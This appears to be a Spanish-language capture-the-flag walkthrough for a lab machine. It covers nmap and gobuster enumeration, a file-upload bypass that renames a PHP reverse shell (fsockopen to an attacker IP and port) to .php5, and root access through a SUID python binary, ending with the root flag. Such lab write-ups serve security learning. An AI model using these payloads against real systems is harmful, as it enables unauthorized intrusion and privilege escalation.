Escaneo de puertos
Copy nmap -p- --min-rate 5000 -sV < I P >
Gobuster
Copy gobuster dir -u http:// < I P > / -w < WORDLIS T >
Info:
Copy ===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.234.69/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/css (Status: 301) [Size: 310] [--> http://10.10.234.69/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.234.69/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.234.69/panel/]
/server-status (Status: 403) [Size: 277]
/uploads (Status: 301) [Size: 314] [--> http://10.10.234.69/uploads/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
Si nos vamos a /panel/
encontraremos que se pueden subir cosas, pero no permite subir .php
que es lo que queremos, por lo que vamos hacer un ByPass
con la extension...
File.php
Copy <? php
$sock=fsockopen( "<IP>" , <PORT>);$proc=proc_open( "sh" , array (0 => $sock , 1 => $sock , 2 => $sock) , $pipes);
? >
Si lo subimos asi no nos dejara, pero cambiamos el .php
por un .php5
por lo que ya no lo reconoceria como un .php
normal quedando algo tal que asi...
File.php5
Una vez subido el archivo nos descubrio un /uploads/
por lo que estara ahi el archivo, lo ejecutaremos desde ahi...
Estaremos a la escucha antes de darle al archivo...
Una vez estando dentro de www-data
vamos a /www/ donde estara la primera flag...
user.txt (flag1)
Si hacemos el siguiente comando para ver los permisos SUID
que tenemos...
Copy find / -type f -perm -4000 -ls 2> /dev/null
Vemos que podemos ejecutar python
como si fuera root
...
Copy 266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
Por lo que haremos lo siguiente...
Copy python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Una vez hecho esto seremos root...
root.txt (flag2)
Copy THM{pr1v1l3g3_3sc4l4t10n}
Last updated 6 months ago